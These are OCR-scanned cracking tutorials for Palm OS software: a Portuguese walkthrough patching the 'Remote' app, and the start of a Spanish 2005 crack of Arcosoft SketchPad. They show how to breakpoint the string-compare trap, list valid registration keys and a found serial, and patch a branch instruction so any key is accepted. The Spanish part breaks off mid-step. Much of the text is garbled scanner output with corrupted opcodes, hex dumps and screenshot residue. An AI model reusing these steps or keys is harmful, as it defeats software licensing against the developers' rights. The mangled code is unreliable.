000004d2 4e4fal92 sysTrapFrmAlert 

000004d6 5c4f ADDO.W  +6,A7 

000004d8 60000086 BRA 143 

000004dc 2f0a L35 MOVE.L A2,-(A7) 

000004de 3f2de162 MOVE.W  -7838(A5),-(A7) 

000004e2 4e4fa815 sysTrap $A815 = Unknown System Trap 
000004e6 b06efebe CMP .W -322(A6),DO 

000004ea 5c4f ADDO.W  +6,A7 

000004ec 666a BNE 142 

000004ee 3£f3c05dc MOVE.W  +1500!$5dc,-(A7) ; Registration failed! 
000004f2 4e4fal92 sysTrapFrmAlert 


O alerta é chamado se a comparacáo na linha 00000%4e6 (CMP.W -322(A6),D0) náo for satisfeita. Verificando o código um pouco mais acima temos: 


00000460 2f0a MOVE.L A2,-(A7) 

00000462 4e4fa0ca sysTrapStrCaselessCompare 
00000466 4a40 TST.W DO 

00000468 504f ADDO.W  +8,A7 

0000046a 664e BNE L34 

0000046c 2f0b MOVE.L A3,-(A7) 

0000046e 4e4fal70 sysTrapFrmDeleteForm 
00000472 1b7c0064e101 MOVE.B  +100!$64,-7935(A5) 
00000478 3£3c0001 MOVE.W  +t1,-(A7) 


0000047c 486de101 PEA -7935(A5) 


Vamos setar um breakpoint no SysTrapStrCaselessCompare (trap que compara 2 strings). Vamos utilizar o southDebugger pra 
isso. Deixamos o programa conforme FIG 3, carregamos o southDebugger, conectamos e voltamos ao POSE. Com o mouse, 
escrevemos no Graffiti do lado esquerdo o seguinte: 


y 


No lado direito do Grafitti (onde escreve-se números) fazemos: 


Isso forca um breakpoint e o controle passa agora para o southDebugger. Agora no southDebugger setamos uma trap no 
SysTrapCaselessCompare conforme FIG. 7. 


* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


: 15 5 SE == CE anna La dl | 


[20BB] $: jatteryDialog 
main | [AOBC] sy=Tr: CopyStringlesource 


[A0BD] ¿Tra Eernellnfo 


NA as] [AGE E - aunchlonsole 
E semen a (a087) e 
¿0B : cayó imerDe . 


notes 


[2003] s<y=sTr: TaskSwitching 


60000400 
4403 
6704 
4E4FADEBE 
2001 
EDODO3SFZ 
4403 
6714 


B z Daia=10019c090 
[2004] =y=Tr: sTimerPead 


[2005] 
[2006] 


[2007] 


19391 
Lamochlonsole] 
2£0CS E sT ¡StrConmnpare 
E Diaria iacina DD9A=10019C90 
[2009] sysTrapStrIToi 
sysTrapStrCaselessCompare 


1 trap stack 


modifyer | type narne value info 


trap breakpoints E cond. trap prealpolnts : 
| 


Compare | E | 


1 


<TrapStri 


[2001] 


NOT SET 
NOT SET 
NOT SET 


NOT SET 


his function is not full implemented yet. | still need full reference lists... 


PruHandleEvent 


1001988c 001 MOYEG $1, DO 


¡¿ Iniciar 560 Flfav. | vr. A is EAN LD 10:17 


FIG. 7 


Teclamos F5. Voltamos ao POSE e digitamos qualquer chave (i.e. 12345678). Ao clicarmos Ok o southDebugger pára no Trap. 


— southDebugger v1.7 - UNREGISTERED ex) 


File Execution Window Tools Plugins Help 


JIBRlES 151500 
breakpoints disassembler trap stack 


main | 


disassembler [PC] ou 


uecmez | mJonos21os E 22 


command notes 


TST.W 

ADDOQ. VW 
oo0éz210c EN B6S ENE $93!174E ¿ShovRegistration+0006215C0=0006215€ 
0006Z10E A 2FOB MOVE. L 3 mM 


Dooézl110 NO.p 4E4FA170 TRAP Fl1S5!7$F, fa41328 724170 [sysTrapFroDeleteForm] 


D00e6zll14 do 1E7?COD64E101 MOVE.E $100!564, $-7935!-JEFF(AS) 
e... 0001 MOVE. W $71, - (47) 
DoO0é6zllE Hm.-. 436DE101 PEA $-7935!1$-1EFF(AS) 


NONI Y VARIA VENIAN ONUDI EENUNIINIOO "7 RURUEIINOA VEIIIOO "C RIUIEIO IEURREIRS  Y VONRIRIIIOD VENIAN COORDINAR YVONNE VERS Y PC 
DO D1 D2 D3 D4 D5 D6 D7 USP 


[00000000-0006225E]: ShowRegistration 


breakpoints ... 


-Ompareíconst Char*s1, const Char*s2) 
A T T 


breakpoints | trap breakpoints | cond. trap breakpoints | 


compareíconstChar*s1, constChar*s?2) 


modifyer name | info 


([A0CA] 


tipe | 
mst Char *: 112345678 


const 


Char [*32 [Ímarmoset 


NOT SET 
NOT SET 
NOT SET 


NOT SET 


his function is not full implemented yet. | still need full reference lists... 


ShowRegistration 


00062104 4E4FAOCA 


¡4 Iniciar 


TRAP HISISF, 
6 0 | avay... 


41162 5A0CA 


e YPN.. ca SOUÉ,.. 


les 


10:20 


FIG. 8 


Verificamos a Janela trap stack. Mostra 2 strings: 
comparada. Anote e tecle F5 novamente. 


URSOJOJOJCISOJA = "5D S 


1é a chave que digitamos a outra é a chave com a qual ser 


* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


18 5 Mane = CE E TA 


— breakpoints _ Misassembler | _ Map stack _ Map stack 


disassembler [PC] 


dec'hex [y [0025 


0025D76C 


DOZ25D756E 


D025D7530 


DO0Z5D734 


4240 
504F 
6654 


1F3C0001 
3F3cC0001 
41EA00BA 
¿FOS 


TST.W 
¿DDQ.W 
ENE 
MOVE.E 
MOVE.BE 
MOVE . Y 
LEA 
MOVE. L 


¿DOZ25D7C6 
R136 17881242) 


$136 !/SEA(AZ), AD 
A0, -(47) 


command 


[0025D7 1E-0025D7C6]: 


copa trap stack 


NONOIIIONOO TV UNIERON CANINA Y VENENOS V RUNDIIUIIO TENIENDO —C VUNINDINIO IEEE Y CANINOS TEREIRUT C- AIUITA IEEE Y; VIRION CER "Y ARI PC 
DO D1 D2 D3 D4 D5 D6 DZ7 


USP 


cond. trap breakpoints | 


OdiNer 


const 


00005 


his function is not full implemented yet. | still need full reference lists... 


DO25D768 4AEAFAOCA 


¿ Iniciar 


TRAP 


$1 


E O  lfavay... 


5!1$F, F$41162 '$A40CA 


[sysTrap3trCaseles 


ca soul... 


sCompare] 


ul Pate... 


EZ OJO OIC = 45D 10:21 


Anote e tecle F5. 


* southDebugger v1.7 - UNREGISTERED 


File Execution Vindow Tools Plugins Help 


BrRrBacIE OO 
ureaivomts  |_uisassembier_ [tap stack 


E 5 9 
E] disassembler [PC] ou 


pa 
dechex 155) El «K E Ds y 


command notes 


4240 TST.W DO 
¿2DDOQ.w Kio, A? 
- 66000040 ENE $l160!$240 ¿O025D93A 
5D83C 0*.. 3 O0AA MOVE. FITOIFAA1AZ), DO 
¿5D 8A0 Br 24008 ¿NDI.W 2048 !7800, DO 
5D3A4 g- 70 BE0 Fl4!/¿E ¡¿OOZ25DSE4 
DOZ25D3A6 a 302240023 MOVE . Y F170!/f22 142), DO 
DOZ5DSAA e 4FEFOO7?S LE2 F120!13 738147), A7 
III INN COIN Y. ION. NIN Y III CINNINUINIOO “GENNIO INN Y ORINOCO ARNO SORIANO. VRNNNNIINON VARIA PC 
DO D1 D2 D3 D4 D5 D6 D7 USP 


[0025D888-0025D8B4]: 


breakpoints : pS E E] trap stack 
Int16 StaselessCompareíconst Char*s1, constChar*s2) 
modifyer tipe pare | alue info 


const Char 


breakpoints | trap breakpoints | cond. trap breakpoints | 


[AO0CA] sysTrapStrCas 


ll 
NOT SET NN 
HOT SET a 
HOT SET a 

idad 


NOT SET 


his function is not full implemented yet. | still need full reference lists... 


0025D890 4E4FADCA TRAP H15!$F, F41162'$40CA [sysTrap3trCaselessCompare] 


¿ Iniciar ES = Palm... úl Patc... FANDOODG ADE 10:22 


FIG. 10 


Anote e tecle F5. 


* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


BREA ces OO 


breakpoints disassembler trap stack 


disassembler [PC] ou 


address ascii 1 command notes 


00251404 JT 4340 TST. DO 
DOZ5AACE 1 . 5720 SE0 DO 
DOZ51AACO ¿y 4400 NEC. po 
DOZSAACA Xx : 3 LEA F120!15$738 147), A7? 
DOZS5AACE ..-8 3 MOVEM. L (4794, DIDADS 
SAADZ Nu 4E75 ETS 

¿5A2D4 qH..2 4SE7?1F3Z MOVEM.L 2A6A322DIDESDS DAD, -(A7) 

OOZ5AADS [n AE, 4FEFFFDC LEA $36 !1p-24 127), A7 


NINOS TT UNINUIINIOS CANUINNINN Y VENNUIIUI IEEE V RUNUIIUINO VENIAN "C RONINUINOON INSIINUIS Y UNUUENNONAS ERNUINNR FRUIT IEEE Y ONNITON CERRAR, PC 
DO D1 D2 D3 D4 D5 D6 D7 USP 


[00254.448-00254AD4]: 


oy EF] trap stack 


lessCompareíconst Char*s1, constChar*s2) 


An ton 


tipe narne | value info 
*= ooo 


DODOS314 


his function is not full implemented yet. | still need full reference lists... 


DOZ25AACO 4E4FAOCA TRAP H15!$F, 


R41162$A0CA 
¿ Iniciar ZOO lfavay.. 2 VPN... 


[sysTrapitrCas 


¿ Iniciar ZOO lava. 2 YPN... ca SsOub... out... — Palm... El Patc... RARE 10:22 


FIG. 11 


Anote e tecle F5. 


* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


JABREBEA CIO 


disassembler [PC] ou 


command notes 


DOZS5AAC4 Ja 4140 TST-U DO 
DOZ5AAC6 1. 5700 SEO DO 
ODZ251AC85 Y 4400 NEC E DO 
a 4FEFOO78 LEA 1201978 (47), A7? 
4CDF0038 MOVEM.L (4734, D3/D4/D5 

Nu 4E75 PTS 

H..2 48E71F32 MOVEM.L 2A6/A3/A2/D7I/DESDS/DA/D3, -147) 
DOOZ25AADS [AS 4FEFFFDC LEA $o3618-24 147), A7? 


borres borre rro bed ercer orbe PC 
DO D1 D2 D3 D4 D5 D6 D7 USP 


[00254448-00254AD4]: 


breakpoints : oy trap stack 
Intlb strCasele ) 
modifyer tipe narne iAfo 


const Char 


breakpoints | trap breakpoints [ cond. trap breakpoints | 


[A0CA] a 


const Char *=z 000053244 


lla 
HOT SET AR 
HOT SET WE 
HOT SET E 
NOT SET a] 


his function is not full implemented yet. | still need full reference lists... 


| pe E e rl al 0 a No li O ea a ANS At deta tr er be ri j 


DO25A44C0 4E4FADCA TRAP H15!$F, FH41162'$A40CA [sysTrapS3trCaselessCompare] 


¡¿ Iniciar O 0 | avay... é YPN... ca 'SQUÉ,.. out... — Palm... | WlPatc... 


Fig. 12 


Anote e tecle F5. Agora O POSE exibe a mensagem de chave inválida. 
Como podemos notar o programa compara nossa chave com as seguintes chaves válidas: 


marmoset 
Philips.ProntoLite.ID=22526 
KOPZOZAM 
5E511E59 
B68BE66C 


Entrando com cada uma delas podemos notar que: 


marmoset = usada para upgrade 

Philips.ProntoLite.ID=22526 = náo sei 

KOPZOZAM = trial para 20 dias 

5E511E59 = desbloqueia programa mas exige marmoset para upgrade 
B6B8BE66C = desbloqueia o programa e faz upgrade (náo exige marmoset) 


As 3 últimas chaves sáo geradas de acordo com o HotSync Name, portanto no seu sistema náo seráo essas chaves exatamente. O importante é saber qual é a 
última delas. Para fazer o patch para aceitar qualquer chave vamos precisar da última. 


2 - Aceitando qualquer registro (Patch) 


Voltando ao código acima temos o seguinte: 


000004dc 2f0a L35 MOVE.L A2,-(A7) 

000004de 3f2de162 MOVE.W  -7838(A5),-(A7) 

000004e2 4e4fa815 sysTrap $A815 = Unknown System Trap 

000004e6 b06efebe CMP .W -322(A6),DO 

00000l4ea 5c4f ADDO.W  +6,A7 

000004ec 666a BNE 142 

000004ee 3£f3c05dc MOVE.W  +1500!$5dc,-(A7) ; Registration failed! 
000004f2 4e4fal92 sysTrapFrmAlert 


Se a linha 00000%e6 náo for satisfeita o programa passa de 00000%ec para 00000l%ee (exibe a mensagem de registro 
inválido). Agora voltamos ao PRCEdit. Devemos mudar BNE L42 para BEQ L42. Entáo fazemos: 


Prcedit - [code0003.s] 


j 


jan 
¿o ve DN a OO] aos JS cue JN a GN e GE de VO as TN UN e TA e BN e ss A o E TA rl JN e A e O e O es E e E a e E e 


) 


+)]-[+)-+) [+]-[+]--4] pa 
mm “D 
o 


E 
a 
pod 

, 


EH 
0 ña 
oO 


E 
Da 


Le 
No] 
Le 


+ 
Do 
n 
O 


H 
Ba 
T 

Y í 


Le 
Do] 


H 
Ba] 
1] 


+ 
a 
¿M0 “y 
un] 


£ 


) 


q 
a 


£ 


oO 006. 070.00.0-0.-0.-0 


) 


ln411, Col 12 


Remote patched pre | REP | code0001.s codeD002.s  code0003.s 


¿fa L34 
q4e“dfabc”7 


hltefehbe 


5c4f 


Jump to address: OODOD4EC F9 
Fe Ed 


Jump with RTS to: <not availible:> 


6I3c 


2000 L37 


3003 


10410500 


óbda0ce 

2000 

3003 
¿3200460800 


BRA L45 
MOVE.L  42,-1147) 
sysTrapStrLen 
CHPI.W $5,DO 
ADDO.W 44,17 
Bcc L35 

MOVE.L  4A3,-1 
sayaTrapFrmDel 


D je 
CS | 
10 
as 
o 
HR 
Z 


MOVE.  Ff2500!$9c4,-(17) :; Short registration € 


ADDQO.W  H6 
ERA L4 
MOVE.L 4 
MOVE. W 
sysaTrap 
CHP. 
ADDO. 
ENE 


SAS), (47) 


Unknown System Trap 


MOVE.  f1500!'$5dc,-(47) ; Registration failed! 


sysaTrapFrmilert 

MOVEO $0,D3 

ADDQ.W 2,147 

BRA L41 

MOVEO $¿0,DOo 

MOVE.W  D3,DO 

CMPI.E- 448'5$30,0(42,DO.Li 
BLT 37 

MOVEO 2¿0,DOo 

MOVE.W.  D3,DO 

CMPI.E $57!/5$39,0(42,DO.Li 
BLE L40 

MOVEO $0,DOo 

MOVE.W  D3,DO 

CMPI.E- f65'3$41,0/[22,DO.Lj 
BLT L35 

MOVEO 2¿0,DOo 

MOVE.W  D3,DO 

CMPI.E £70!/5$46,0(22,DO.Li 
BLE L40 


NOE =<: 


[e 
[És 


Prcedit - [C:Wocuments and Settings1f9197911Weus documentosWocumentos do StanleylWownloadsipalmiFilesiRemote. patched.prc] 
* File Edit Insert View Tools Window Help 


From assembler hed.pre | ECP | codeD001. | codeD002 | codeDD0D03.: | 


60 (BRA) 0254 
66 (BRE) 6040 
pes 
448 (TRAP into debugger) 41EE 
4E71 (MOP) 07277 


mM le ME 


un] 


Ho+ + + pa 


7000 (Pr 


no 


veQ 40, DO) 0010 
486E 


E 


(E 
S 4227 


0004 
Manage. 4E4F 

ES 2FD8 
4E4F 
4240 
0105 
504F 
3JE3C 


¿000 
190: El1D 
20: FFC4A 

BBO: DOFC 

CO: 2FOB 

DO: 6000 

DO: FEBE 

544F 

7000 

DC32 
D8D0 
7000 
4E4F 
¿FOB 
422D 

FEBE 

) : B60É 
9D: 1B7C 

JA0: 2000 


arar 


4850 
7000 
2F00 
FFEDO 
4650 
456E 
FFEDO 
4E4F 
0044 
a180 
4E4F 
a170 
584F 
41FA 
664E 
0001 


2000 
6004 
3F3C 
2FDA 
4E4F 
0086 
50 4F 
6056 
3003 
0041 
6F24 
30053 
2192 
4E4F 
El1D 
0240 
7040 
0001 
2000 


a4ar7E 


| Pos: 2C3E4h, 182500 


45b6É 
3003 
45bE 
5584F 
45bE 
FECO 
4E4F 
A10A 


07D? 


5C4F : 
A139 2: 


564F 
6600 
0190 
2FOB 
486b 


2000 
2000 
1990 
4E4F 
a170 
2F0A 
B65A 
7000 


an nas 


0s00 


nas 
[6% y 


544F 
2170 
302E 
0100 
co0aD 
E11D 
2000 


anaa 


FEDOO 
41EE 
FFOD 
4870 
FFOOD 
4E4F 


A0C7 


¿000 
2000 
4E4F 
anc7 
330 
3F2D 
3F3C 
3003 
0039 
B6Doc 
3003 


0066 


6008 5243 


5584F 
FEBE 


6618 30 


EAF6 
BE2D 
2000 
EBREF 


Resource; 


4E4F 
FECO 
4E4F 
1800 
4E4F 
ante? 
584F 
15E0 
FF45 
2FOB 
2004 
D120 
4E4F 
2FDA 
a170 
330 
4EAD 
2000 
a192 
0ca40 
09.4 
Elb62 


6606 
El1D 
4EAD 


TIGO 


ancs 
1030 


a0c7 


4E4F 
AOCE 
B640 
3FD0 
4E4F 
3F3C 
4E4F 
584F 


2FOA 4 


7600 
0800 


7200 
Ancg 
5243 
584F 
486E 
A192 
07D4 
A183 


6608 


A170 50 


4E4F 1 


1B7C 
0025 
FES5SC 
2000 
4FEF 
po06 
4E4F 
4E4F 


C 4E4F 
12 0030 


BF3C 


' 0061 


BEDC 
0043 


0001 
0800 
FEBE 
422D 
Br10 
FFC4 


GEA 


0064 
60043 
1B7C 
2000 
DOOE 
584F 
a192 
2815 
2192 
0800 


032 


00 
¡ESC 
008 
600 
6622 
0240 
E101 
6004 
40DF 


973 


7000 S0 


504F 
4880 
3200 
41FA 
4FEF 
BSB2 
FEDO 
4FEF 
2FOB 
50 4F 
2FOB 
ante 
6000 
4340 
E101 
2000 
0001 
4EAD 
6000 
6414 
50 4F 


¡OBÉ 
7600 


302E 
2000 
6706 
2000 
1CF5 


7A7O 


.THPHny.NO 4w.PO 
'Op.0.AipA.0..HI 
HA/.Hny.NO Cr.2. 
Aiy.XOHp..NO EAú 
."HPHny.NO FRCO1 
. Hnpáxo (a 
Hr. .NO € , 
B'NO¡. 

De. 


De ? 


£ NO C 
JEXOf./.NO|pxO". 
¿A .IHP-.NO EJo 
POfN-.NOIp.]| .dá. 
PL. MAIL 
.N-pr.].. 
A a a NS 
va?< INO(01..” 


.i/.NO C.0..XOd. 


¡A A A 9 E TAN E 


095: 0..2. 0. M, 
¡AO A A | 
NO¡ "TO" .RC.C..e? 
/ NOIpXO.E..g.úE 
B-4.0.p4.0..£"0. 


p4.0,.£.0.pX.0 


IN=/ALB.a 
A SE 


Es 


Prcedit - [C:Wocuments and Settings1f9197911Weus documentosWocumentos do StanleylWownloadsipalmiFilesMRemote. patched.prc] 
* File Edit Insert View Tools Window Help 


ces 0254 4850 
1 Forms 6040 7000 
d Alerts 4800 2F00 
— timos 207B0: 41EE FEOO 
Y Datall 00: 0222 4850 


od C7DO: 0010 4B6E 


93 Changes 4586É FEOO 
2) Search Results 2C7FO: 4227 4E4F 
; DOD0a 0044 
4E4F A150 
2FOS 4E4F 
4E4F A170 
42340 5584F 
0108 41FA 
: 504F 664E 
70: SF3€ 0001 


+)]-[+)-+) [+]-[+]--4] pa 


0: 2000 2000 


190: El1D 6004 
20: FFCO4 SFS3C 
BBO0: DOFC 2F0A 
2F OB 4E4F 
DO: 6000 0056 
D: FEBE 5C4F 
544F 6056 
7000 3003 
pes2 0041 
0500 6F24 
7000 3003 


FEBE 0240 
B6DÉ 7040 
187€ 0001 
2000 2000 


4rEF ARTE 
| Pos: 2C3E4h, 182500 


4E4F A192 
2FOB 4E4F A 
422D El1D 3 


4BbE 
3003 
456ÉE 
5584F 
456É 
FECO 
4E4F 


2104 3 


O7FD7 
50 4F 
2139 
564F 
6600 
0190 
2FOB 
486b 


2000 
2000 
1990 
4E4F 
a170 
2F0A 
676A 


0032 
0800 


¿ODO 


0100 
Cco0aD 
El11D 
2000 


anaa 


[ 
[Resource: 


FFO 
41EE 
FFOO 
4870 
FFOO 
4E. 


20 


Ha 
AN 


67 
3F 
2448 
60 
2F 
4850 
4E4F 
E101 


4E4F 
ane7 
330 
3F2D 
3F3C 
3003 
0039 
B6Doc 
3003 


0066 


NOOO BSO O 
mu] 


6008 5243 


5584F 
FEBE 


6618 30 


EAF 6 
BE2D 


¿000 
ARAF 


4E4F 
FECO 
4E4F 
1800 
4E4F 
ante? 
584F 
15E0 
FF45 
2FOB 
2004 
D120 
4E4F 
2FDA 
a170 
330 
4EAD 
2000 
a192 
0040 
09.4 
Elb62 


6606 
El1D 
4EAD 


TIGO 


2005 
1030 


a0c7 


4E4F 
A0C6 
B640 
3FD0 
4E4F 
3F3C 
4E4F 
584F 


2FOA 4 


7600 
0800 


7200 
2009 
5243 
584F 
486E 
a192 
0O7D4 
21803 


6600 


A170 50 


4E4F 1 


1B7C 
0025 
FES5SC 
2000 
4FEF 
po06 
4E4F 
4E4F 


C 4E4F 
12 0030 


BF3C 


' 0061 


BEDC 
0043 


0001 
0800 
FEBE 
422D 
Br10 
FFC4 


GEA 


a 
aula 


0064 


600432 2 


1B70 
2000 
DOOE 
5684F 
a192 
as15 
2192 
0800 


032 


00 
¡ESC 
008 
600 
0240 
E101 
6004 
40DF 


973 


7000 3 


6622 : 


504F 
4560 
3200 
41FA 
4FEF 
B5B2 
FE DO 
4FEF 
2FOB 
50 4F 
2FOB 


anna 
AI 


00 
40 
o1 
Do 
0001 
4EAD 
6000 
6414 
50. 4F 


6 
El 


El 
E 


¡OBÉ 
7600 


2000 
6706 
2000 
10F5 


7A7O 


.THPHny.NO Aw.PO 
'p.0.AipA.0..HI 
HA .Hny.NO (r.2. 
Ai. .XOHp..NO ÉAú 
. "HPHni.NO ERCO1 
. HnpáANo CMEXOe ? 
Hny. NO CXO? 
B'NO¡. 

.D. 


¿.NO195H 
NOIpxO" 


¿NO € 
JOXOf ./.NO¡pxO”. 


A. IHP-.NO EJo 
POfN-.NOIp.]| .dá. 
PL. MAIL 
.N-pr.].. 
co... .N- 
<.IN0¡701..” 


TO "Vp.0..2.0..m. 
¡A A A 9 E PAN E 


y A 


¿ae Mp eE 
095: 0..2. 0. M, 
¡AO A A | 
NO¡“TO" .RC.C.,.er 
¿NO ip 
B-4.0.p%.0,.£"0. 
p4.0..£.0.p4.0 


IN=/ALB.a 
A SE 


Es 


Nota-=se a mudanca assinalada de amarelo. 


Identifique os trechos do programa conforme abaixo no PRCEdit e efetue as 


vermelho). 

000004e2 4e4fa815 

000004e6 b06efebe 

000004ea 5c4f 

000004ec 666a BEOQ 
000004ee 3f3c05dc 

000004f2 4e4fal92 

0000015c 302efebe L8 

00000160 02400100 

00000164 670000ce BNE 
00000168 3f3c10cc 

0000016c 600a 

00000234 422de116 L14 

00000238 422del1d 

0000023c 302efebe 

00000240 02400800 

00000244 6624 

00000246 302efebe 

0000024a 02400100 

0000024e 66la BEOQO 
00000250 302efebe 

00000254 02402000 

00000258 6610 BEOQ 
0000025a 7040 

00000250 c0adeaf6 

00000260 6608 

00000262 0c2d0064e101 

00000268 6606 

0000026a 1b7c0001e1l1d L15 

00000270 4a2delld L16 TST.B -7907(AS) 
00000274 671c 

00000276 48780000 

0000027a 48780000 

0000027e 486efec0 

00000282 3f3c076c 


00000286 4e4fa194 


Salve. 


sysTrapFrmCustomAlert 


Abra o POSE novamente. 


sysTrap $A815 = Unknown System Trap 
CMP.W  -322(A6),D0O 
ADDO.W  +6,A7 

BNE L42 

MOVE.W  +1500!$5dc,-(A7) ; Registration failed! 
sysTrapFrmAlert 

MOVE .W  -322(A6),DO0 
ANDI.wW  +256!$100,D0 

BEO L14 

MOVE.W  +4300!$10cc,-(A7) 
BRA L9 

CLR.B -7914(A5) 

CLR.B -7907(A5) 

MOVE.W  -322(A6),D0 
ANDI.W 2048!$800,D0 
BNE L15 

MOVE.W  -322(A6),D0 
ANDI.wW  +256!$5100,D0 

BNE L15 

MOVE.W  -322(A6),D0 
ANDI.W 8192!$2000,D0 
BNE L15 

MOVEOQ 64,D0 

AND.L -5386(A5),D0 

BNE L15 

CMPI.B 100!$64,-7935(A5) 
BNE L16 

MOVE .B 1,-7907(A5) 

BEO L17 

PEA $0000.W 

PEA $0000.W 

PEA -320(A6) 


MOVE.W  +1900!$76c,-(A7) 5; 


Registration 


O programa criará o arquivo Remote.patched.PRC 


Faca o HotSync desse novo arquivo para seu POSE. 


Seu programa está registrado automaticamente. 


Afer Ventus 


demais 


mudancas 


(as alteracóes estáo em 


Brasil 
post _nubilalyahoo.com.br 


Palm Spanish Tutor: Página dedicada a la divulgación de información en Castellano, sobre Ingeniería 


Inversa y Programación en Palm. E-mail "Colabora con tus Proyectos" 


Palm Spanish Tutor 


X)Serial ()HotSync/Code ()Trial ()Multiprotección ()Encriptado ()Otro 
Simple Paint como el de Windows XP podemos guardar notas, dibujos. 
Encontrar el serial valido (Crack limpio) 


Dificultad: |(xX)NewBies ( )Intermedio ()Avanzado ( )Master ( )Gúru 


a 


Herramientas: | SouthDebugger, PRCedit, PilotDis. Palm Real ó Pose emulador, UltraEdit-32, PalmDemon 0.27 PalmDebugger 


Palm CRACKER: SkyNet | FECHA: s/24/Sep/2005 


INTRODUCCION 


To install this Palm application on to your Palm PDA, double click on sketch.prc. By installing the 
software, you have accepted the licensing agreement and disclaimer of warranty. 


Sketches created on the Palm may be viewed and exported on your Windows or Mac computer by using the 
SketchPad Desktop Viewer downloaded separately. 


For more information on how to use SketchPad, see the SketchPad User Guide. 


Revision History 
2.1b (Apr. 4, 2001) 


e fixed a bug where pressing the draw/erase button was not updating the on screen draw/erase button 
e compatibility with new models 


Licensing 


SketchPad is copyrighted software and remains the intellectual property of Arcosoft Inc. This copy has been 
provided to you for evaluation purposes only. Please register SketchPad at www.arcosoft.com if you intend 


to keep using it. 
Disclaimer of Warranty 


Software is provided on an "AS IS" basis, without warranty of any kind, including without limitation the 
warranties of merchantability, fitness for a particular purpose and non-infringement. The entire risk as to the 
quality and performance of the Software is borne by you. Should the Software prove defective, you and not 
Arcosoft assume the entire cost of any service and repair. In addition, the security mechanisms implemented 
by Arcosoft software have inherent limitations, and you must determine that the Software sufficiently meets 


your requirements. This disclaimer of warranty constitutes an essential part of the agreement. 


Arcosoft Inc. 
www.arcosoft.com 


AL ATAQUE 


Cargamos el programa y aparece una molesta nag diciendo que nos registramos ó de lo 
contrario siempre veremos una molesta nag con una nota que dura 15 segundos 
recordandonos que debemos regitrarnos 

Cargamos el PalmDebugger cargamos la aplicación en el debugger y antes que todo 
intentamos porner un breakpoint con la instrucción como vemos en la parte de abajo. 


Initializing parser... 
Initializing lex... 
Installing keywords... 
Initializing eval... 
Initializing exec... 
Loading startup script... 


DebO0ut = false 
SymbolsOn = true 
StepRegs = false 
ReadMemHack = false 
Attached = false 

dot address = 00000000 
last address = 00000000 
last count = 00000000 


att 

EXCEPTION 1D = $80 

'"TargetCfgRoutines' 

+$00FO 1018871C *LINK A6,$0000 | 4E56 0000 

atb "frmalert" <--=- Ponemos el breakpoint justo para dar un click en el boton 


de registro de validar el serial desde el emulador 
A-trap set on 0192 (frmalert) 


g <--- Entrá al emulador 

EXCEPTION 1D = $80 

'ShowCodeDialog' 

+$00AC 00072F2A *_FrmAlert ; $10069070 | 4E4F A192 

dm d5 100 <--=-= Miramos todos los registro Al...A7 , DO....D7 


Encontramos que en esta dirección hay un registro sospechoso 
Nos registramos con este y el serial es valido pero nos da las 
gracias ni nada por el estilo será el programador un estúpido mal 
agradecido. 
00072F50: 32 36 30 32 36 35 36 34 31 36 00 00 4E 56 00 00 "IPIETESES. NV..." 
00072F60: 2F OA 2F 03 24 6E 00 08 76 00 0C 52 00 09 66 14 "/./.Sn..v..R..f." 
00072F70: 30 2A 00 08 04 40 05 DF 67 02 60 24 4E BA FF 00 "0*...0..g. $N..." 
00072F80: 76 01 60 1C 0C 52 00 18 66 16 4E 4F Al 73 24 48 "v.' ..R..f.NO.s$H" 
00072F90: 2F OA 4E 4F Al 71 2F 0A 4E BA FC D2 76 01 50 4F "/.NO.q/.N...v.Po" 


00072FA0: 10 03 26 1F 24 5F 4E 5E 4E 75 94 52 65 67 69 73 "..£.$_N*"Nu.Regis" 
00072FB0: 56 69 65 77 48 61 6E 64 6C 65 45 76 65 6E 74 00 "ViewHandleEvent." 
00072FC0: 00 00 4E 56 00 00 2F 0A 2F 03 24 6EÉ 00 08 0C 52 "..NV.././.$n...R" 


00072FD0: 00 17 66 00 00 80 36 2A 00 08 3F 03 4E 4F Al 6F "..f...6*..7?.NO.o" 


00072FE0O: 24 48 2F 0A 4E 4F Al 74 5C€ 4F 30 03 04 40 03 E8 "SH/.NO.tXO00..t.." 
00072FFO: 67 28 04 40 00 64 67 30 04 40 00 64 67 38 04 40 "g(.t.dg0.R.dg8.a" 
00073000: 01 2C 67 08 04 40 01 2C 67 3A 60 44 48 7A FF 4E ".,g..t.,g: DHz.N" 
00073010: 2F OA 4E 4F Al 9F 50 4F 60 36 48 7A F2 60 2F 0A "/.NO..PO' 6Hz.'/." 
00073020: 4E 4F Al 9F 50 4F 60 28 48 7A DE 84 2F 0A 4E 4F "NO..PO' (Hz../.NO" 
00073030: Al 9F 50 4F 60 1A 48 7A CD A2 2F 0A 4E 4F Al 9F "..PO' .Hz../.NO.." 
00073040: 50 4F 60 0C 48 7A D1 06 2F OA 4E 4F Al 9F 50 4F "PO' .Hz../.NO..PO" 
DO: 00000000 
D1: 00002000 
D2: 0000006C 
D3: 00000000 
D4: 007F0642 
D5: 00072F50 
D6: 000027AE 
D7: 0003D07E 
AO: 0003E67C 
Al: 1018462C 
A2: 0O0005ÉE6A 
A3: 00005F72 
AZ: O0005EDE 
A5: 00005D10 
A6: O0O3BAAS 
A7: 0003BA8EÉ 
SR: tSxnzvc O 


602656416 


clave correcta es 


PASO 2 


Editamos nuestro programa víctima con cualquier editor hexadecimal en nuestro caso Ultraedit32 


00003550h: 
00003560h: 
00003570h: 
00003580h: 
00003590h: 
00003340h: 
000035b0h: 
000033c0h: 
000035d0h: 


49 6E 69 74 00 94 54 68 61 6E 6B 20 79 6F 75 20 ; Init.”Thank you 
66 6F 72 20 65 76 61 6C 75 61 74 69 6E 67 20 74 ; for evaluating t 

68 69 73 00 73 6F 66 74 77 61 72 65 2E 20 54 68 ; his.software. Th 
65 20 72 65 67 69 73 74 65 72 65 64 20 76 65 72 ; e registered ver 

73 69 6F 6E 00 00 72 65 6D 6F 76 65 73 20 74 68 ; sion..removes th 
69 73 20 72 65 6D 69 6E 64 63 72 2E 00 00 52 65 ; is reminder...Re 
67 69 7374 72 61 74 69 6F 6E 20 69 73 20 73 69 ; gistration is si 

6D 70 6€ 653 20 61 6E 64 20 6F 6É 2D 6C 69 6E 65 ; mple and on-line 
2E 00 56 69 73 69 7420 77 77 77 2E 61 72 63 6F ; ..Visit www.arco 


Editamos nuestro programa víctima y lo cambiamos por la cadena 


00003550h: 
00003560h: 
00003570h: 
00003380h: 
00003590h: 
